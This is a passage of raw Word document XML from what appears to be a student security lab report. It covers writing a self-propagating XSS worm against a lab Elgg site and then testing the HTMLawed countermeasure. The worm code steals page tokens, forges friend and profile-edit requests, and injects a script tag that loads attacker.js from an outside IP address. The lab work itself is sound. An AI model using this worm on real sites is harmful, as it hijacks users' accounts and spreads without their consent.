        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032232C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FB5CD6" w14:textId="77777777" w:rsidR="0032232C" w:rsidRDefault="0032232C" w:rsidP="0032232C"/>
    <w:p w14:paraId="328FBD97" w14:textId="7896ED5C" w:rsidR="00F912BC" w:rsidRDefault="0032232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) </w:t>
      </w:r>
      <w:r w:rsidR="000656CE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 result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3524BB" w14:textId="3B526970" w:rsidR="00F912BC" w:rsidRDefault="0032232C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ust after Alice searched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arched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search bar, they became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iends and has the same profile as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’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47F77E5" w14:textId="29BFFCA8" w:rsidR="001A6B87" w:rsidRDefault="004634CA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4634C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54C72F3" wp14:editId="28C7745B">
            <wp:extent cx="5274310" cy="675005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="78" name="图片 7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图片 78" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成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4AAE" w14:textId="52EB93A4" w:rsidR="001A6B87" w:rsidRDefault="004634CA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4634C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0ADADE" wp14:editId="06C79F67">
            <wp:extent cx="3695700" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="79" name="图片 79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图片 79" descr="文本&#10;&#10;低可信度描述已自动生成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F1CA4" w14:textId="52AB7D65" w:rsidR="001A6B87" w:rsidRDefault="00C6197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C6197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F65BF1" wp14:editId="56C58537">
            <wp:extent cx="3366930" cy="1865472"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="86" name="图片 86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图片 86" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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380367" cy="187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4F434" w14:textId="3AF91CD3" w:rsidR="001A6B87" w:rsidRDefault="001A6B87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4FDF886" w14:textId="3B16B6D8" w:rsidR="0032232C" w:rsidRPr="000C1189" w:rsidRDefault="0032232C" w:rsidP="00E1187E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc89727057"/>
      <w:r w:rsidRPr="000C1189">
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="000C1189">
        <w:t xml:space="preserve"> Task </w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="000C1189">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0032232C">
        <w:t>Writing a Self-Propagating XSS Worm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4CDC7302" w14:textId="2E17E1E2" w:rsidR="00C6197B" w:rsidRDefault="0032232C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On the base of what we did in task 5, things becom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asily.Th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only more thing we need to do is to loc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arge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the page</w:t>
      </w:r>
      <w:r w:rsidR="009044D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use it instead of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009044D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Samy’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009044D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0656CE" w14:paraId="01C9C9F8" w14:textId="77777777" w:rsidTr="003C2004">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EF4F374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41" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="562C6FCC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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000656CE" w14:paraId="2766F328" w14:textId="77777777" w:rsidTr="003C2004">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3555CEF0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cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37F0AE99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cookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000656CE" w14:paraId="3D59A2EE" w14:textId="77777777" w:rsidTr="003C2004">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="338B1BA0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__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_ts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AAF97A6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elgg-menu-content")[2].href.substr(50, 10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000656CE" w14:paraId="7C111C85" w14:textId="77777777" w:rsidTr="003C2004">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32CC6665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__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_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6680F3AD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elgg-menu-content")[2].href.substr(74, 22)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000656CE" w14:paraId="2A4A0830" w14:textId="77777777" w:rsidTr="003C2004">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37801101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my_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4719226A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spellEnd"/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 xml:space="preserve">-border-plain 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-transition")[0].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src.substr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104, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000656CE" w14:paraId="3318FD04" w14:textId="77777777" w:rsidTr="003C2004">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7528DE72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656CE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r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6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BEAA06B" w14:textId="77777777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document.getElementsByClassName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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("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 xml:space="preserve">-border-plain </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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elgg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000656CE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>-transition")[0].alt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000656CE" w14:paraId="2922A9BF" w14:textId="77777777" w:rsidTr="003C2004">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60AF5B9E" w14:textId="224C9CE4" w:rsidR="000656CE" w:rsidRPr="000656CE" w:rsidRDefault="000656CE" w:rsidP="003C2004">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000656CE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target</w:t>
            </w:r>
            <w:r w:rsidRPr="000656CE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_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="425A9C15" w14:textId="15900A7C" w:rsidR="000656CE" w:rsidRPr="000656CE" w:rsidRDefault="000656CE" w:rsidP="003C2004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0656CE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cument.getElementsByClassName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000656CE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("photo u-photo")[0].</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000656CE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rc.substr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000656CE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(104, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39248142" w14:textId="487FA42E" w:rsidR="000656CE" w:rsidRDefault="000656CE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3CA656E" w14:textId="6E3C3D02" w:rsidR="000656CE" w:rsidRPr="000656CE" w:rsidRDefault="000656CE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 Code of my attacker.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27308D9E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// Task 6: For everyone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB59C0D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// Enze Xu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E30544C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Hello I am the attacker!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0F1EBC95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</w:p>
    <w:p w14:paraId="293552DB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elgg_ts</w:t>
      </w:r>
      <w:proofErr w:type="spell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gramStart"/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elgg-menu-content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href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50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10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7DB87445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elgg_token</w:t>
      </w:r>
      <w:proofErr w:type="spell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gramStart"/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elgg-menu-content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href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74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2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8517DAB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target_id</w:t>
      </w:r>
      <w:proofErr w:type="spell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spellEnd"/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photo u-photo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0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rc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104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 xml:space="preserve">//let </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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samy_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> = String(47);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594ED3AC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okie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okie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:p>
    <w:p w14:paraId="401B636C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me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spellEnd"/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-border-plain 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-transition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0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al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</w:p>
    <w:p w14:paraId="75C1FC53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my_id</w:t>
      </w:r>
      <w:proofErr w:type="spell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docum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getElementsByClassName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-border-plain 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elgg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-transition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[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0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].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rc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ubstr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104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color w:val="FF8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>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DF9F10B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target_id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target_id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68A0F442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cookie = "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oki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01C769D6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lastRenderedPageBreak/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__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elgg_ts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elgg_ts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5A33F2C2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__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elgg_token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__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elgg_token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15F4E947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me = "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m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6FA60961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my_id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 xml:space="preserve"> = "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my_id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4FC2BE1B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</w:p>
    <w:p w14:paraId="7D03F2FD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if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my_</w:t>
      </w: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id</w:t>
      </w:r>
      <w:proofErr w:type="spell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!</w:t>
      </w:r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target_id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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8DC44E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// make friends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B0A97F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proofErr w:type="gramStart"/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ull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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C6339B7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ew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XMLHttpRequest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25A9ED62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http_url1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gram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http://www.xsslabelgg.com/action/friends/add?friend=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target_id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&amp;__elgg_ts=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__elgg_ts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&amp;__elgg_token=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__elgg_token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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0304A285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http_url1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63DB7A97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open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POST</w:t>
      </w:r>
      <w:proofErr w:type="gram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http</w:t>
      </w:r>
      <w:proofErr w:type="gram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_url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tru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75FAEE7D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Host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www.xsslabelgg.com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369C1704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Keep-Alive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300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1D2BB39F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Connection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keep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-alive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309692F6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Cookie</w:t>
      </w:r>
      <w:proofErr w:type="gram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okie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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1B90A3B0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Content-Type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application/x-www-form-urlencoded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16E452E2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nt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//var content="name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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=..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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&amp;description=...&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504C6791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1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nd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tent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1E2DF9BF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</w:p>
    <w:p w14:paraId="64D2E695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// alter profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E4C5F0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proofErr w:type="gramStart"/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ull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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="288A3991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new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XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spell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59CF3E0D" w14:textId="08508061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let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http_url2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'http://www.xsslabelgg.com/action/profile/edit?__elgg_token='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__elgg_token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'&amp;__elgg_ts='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__elgg_ts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'&amp;name='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m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'&amp;description=&amp;accesslevel[description]=2&amp;briefdescription=&lt;script type="text/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javascript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 src=http://13.58.241.86:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>8888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/js/attacker.js&gt;&lt;/script&gt;&amp;accesslevel[briefdescription]=2&amp;location=&amp;accesslevel[location]=2&amp;interests=&amp;accesslevel[interests]=2&amp;skills=&amp;accesslevel[skills]=2&amp;contactemail=&amp;accesslevel[contactemail]=2&amp;phone=&amp;accesslevel[phone]=2&amp;mobile=&amp;accesslevel[mobile]=2&amp;website=&amp;accesslevel[website]=2&amp;twitter=&amp;accesslevel[twitter]=2&amp;guid='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+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my_id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</w:p>
    <w:p w14:paraId="7E8C5269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http_url2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6842703E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b/>
          <w:bCs/>
          <w:color w:val="804000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>open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POST</w:t>
      </w:r>
      <w:proofErr w:type="gram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http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_url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tru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57D8DC27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Host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www.xsslabelgg.com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3582B802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Keep-Alive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300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72D9F785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Connection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keep</w:t>
      </w:r>
      <w:proofErr w:type="spell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-alive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2EF99E81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proofErr w:type="spell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Cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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okie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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39429800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tRequestHeader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Content-Type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,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application/x-www-form-urlencoded"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4ACE095F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8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var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content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=</w:t>
      </w:r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;</w:t>
      </w:r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//var content="name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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=..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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&amp;description=...&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000656CE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>=";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4A6564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Ajax2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send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tent</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0A208C0B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA925E4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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>else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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1F4F86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 xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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console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.</w:t>
      </w:r>
      <w:r w:rsidRPr="000656CE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>log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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000656CE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>"I don't need to be my friend or alter my profile."</w:t>
      </w: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t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353AD49F" w14:textId="77777777" w:rsidR="000656CE" w:rsidRPr="000656CE" w:rsidRDefault="000656CE" w:rsidP="000656C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Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000656CE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28646E7C" w14:textId="1E468FB1" w:rsidR="000656CE" w:rsidRDefault="000656CE" w:rsidP="000656C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Test result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEF535B" w14:textId="51952A47" w:rsidR="000656CE" w:rsidRDefault="000656CE" w:rsidP="000656CE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irst logged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eset all his profile, then searched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licked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002CC703" w14:textId="6283C912" w:rsidR="00C6197B" w:rsidRDefault="00C6197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6A5D20DD" wp14:editId="376C3C86">
            <wp:extent cx="5274310" cy="2927985"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="90" name="图片 90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图片 90" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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5AB3A" w14:textId="4947D9EE" w:rsidR="000656CE" w:rsidRDefault="000656CE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wonder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gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>injected</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000E5029">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and he becomes a friend of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E5029">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Samy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I logged into Charlie for the first time and then searched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licked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D2A916" w14:textId="1C2555CD" w:rsidR="00C6197B" w:rsidRDefault="00C6197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C6197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17E8814" wp14:editId="74D1417F">
            <wp:extent cx="4175486" cy="2367751"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="91" name="图片 9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图片 91" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成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187078" cy="237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2C" w14:textId="03D7EAB0" w:rsidR="000656CE" w:rsidRDefault="000656CE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532467" wp14:editId="5AF25FBD">
            <wp:extent cx="4281330" cy="2394782"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="95" name="图片 95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图片 94" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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609" cy="240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80022" w14:textId="2863FF53" w:rsidR="000656CE" w:rsidRDefault="000656CE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O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kay </w:t>
      </w:r>
      <w:r w:rsidR="000E5029">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">poor Charlie has his first friend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has been injected the same </w:t>
      </w:r>
      <w:r w:rsidR="009044D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">malicious code in his profile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">just because he clicked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o has been inject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>. Success!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767E3DE3" w14:textId="77777777" w:rsidR="000656CE" w:rsidRDefault="000656CE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74F286E" w14:textId="2E52E56A" w:rsidR="001A6B87" w:rsidRDefault="00C6197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37CD6E" wp14:editId="090FEFF7">
            <wp:extent cx="5274310" cy="2950210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="94" name="图片 94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图片 94" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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4EF40" w14:textId="1F602BE3" w:rsidR="001A6B87" w:rsidRDefault="001A6B87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7CEBB3" w14:textId="77777777" w:rsidR="009044D9" w:rsidRPr="009044D9" w:rsidRDefault="009044D9" w:rsidP="00E1187E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc89727058"/>
      <w:r w:rsidRPr="009044D9">
        <w:t>3.7 Task 7: Countermeasures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="66A1A875" w14:textId="27133637" w:rsidR="000E5029" w:rsidRPr="000E5029" w:rsidRDefault="000E5029" w:rsidP="000E502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E5029">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Activate only the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E5029">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTMLawed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E5029">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.8 countermeasure but not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E5029">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>htmlspecialchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E5029">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>; visit any of the victim profiles and describe your observations in your report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47805A50" w14:textId="2FD222FA" w:rsidR="009044D9" w:rsidRDefault="000E5029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g in as admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9497DB" w14:textId="7DB5062C" w:rsidR="000E5029" w:rsidRDefault="000E5029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0E502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4BACA76" wp14:editId="1A5D5FFF">
            <wp:extent cx="5274310" cy="2988310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="97" name="图片 97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图片 97" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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37162" w14:textId="278AE90F" w:rsidR="000E5029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llow the steps and fin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TMLaw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8 plugin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7FD601" w14:textId="0EBAA23A" w:rsidR="000E5029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026A9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8EE50D5" wp14:editId="6ECCF907">
            <wp:extent cx="5274310" cy="3771900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98" name="图片 9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片 98" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成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80F50" w14:textId="7AF3E35B" w:rsidR="000E5029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ctivate it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C62C76" w14:textId="78A125B3" w:rsidR="000E5029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026A9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3047C0" wp14:editId="472FEA9D">
            <wp:extent cx="5274310" cy="673735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="99" name="图片 99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图片 99" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成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CD85" w14:textId="163428B1" w:rsidR="000E5029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log into Charlie and clean all. Then try click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B473B5E" w14:textId="2D6927BA" w:rsidR="00026A9B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026A9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625CDA2" wp14:editId="4ECA473F">
            <wp:extent cx="5274310" cy="2990850"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="100" name="图片 100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图片 100" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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A93A" w14:textId="66D2D938" w:rsidR="00026A9B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harlie becomes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iend again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF38E48" w14:textId="401BA8B3" w:rsidR="00026A9B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23AE34" wp14:editId="119F6047">
            <wp:extent cx="5274310" cy="2124710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="102" name="图片 102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图片 102" descr="图形用户界面, 应用程序, Word&#10;&#10;描述已自动生成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974C7" w14:textId="01238CD3" w:rsidR="00026A9B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ut Charlie’s profile is clean!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDE2955" w14:textId="3BB0295C" w:rsidR="00026A9B" w:rsidRDefault="00026A9B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702F7A06" wp14:editId="5D75AA49">
            <wp:extent cx="5274310" cy="2703195"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="105" name="图片 105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图片 105" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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85A2D" w14:textId="2CE10CC9" w:rsidR="009044D9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log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o </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>at this ti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s friend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alicious code in his profile. However, by click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in, the malicious code in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Boby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file disappear!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6396DE" w14:textId="4202C66A" w:rsidR="00026A9B" w:rsidRDefault="00026A9B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026A9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FBB9BC1" wp14:editId="3F45B503">
            <wp:extent cx="5274310" cy="2659380"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
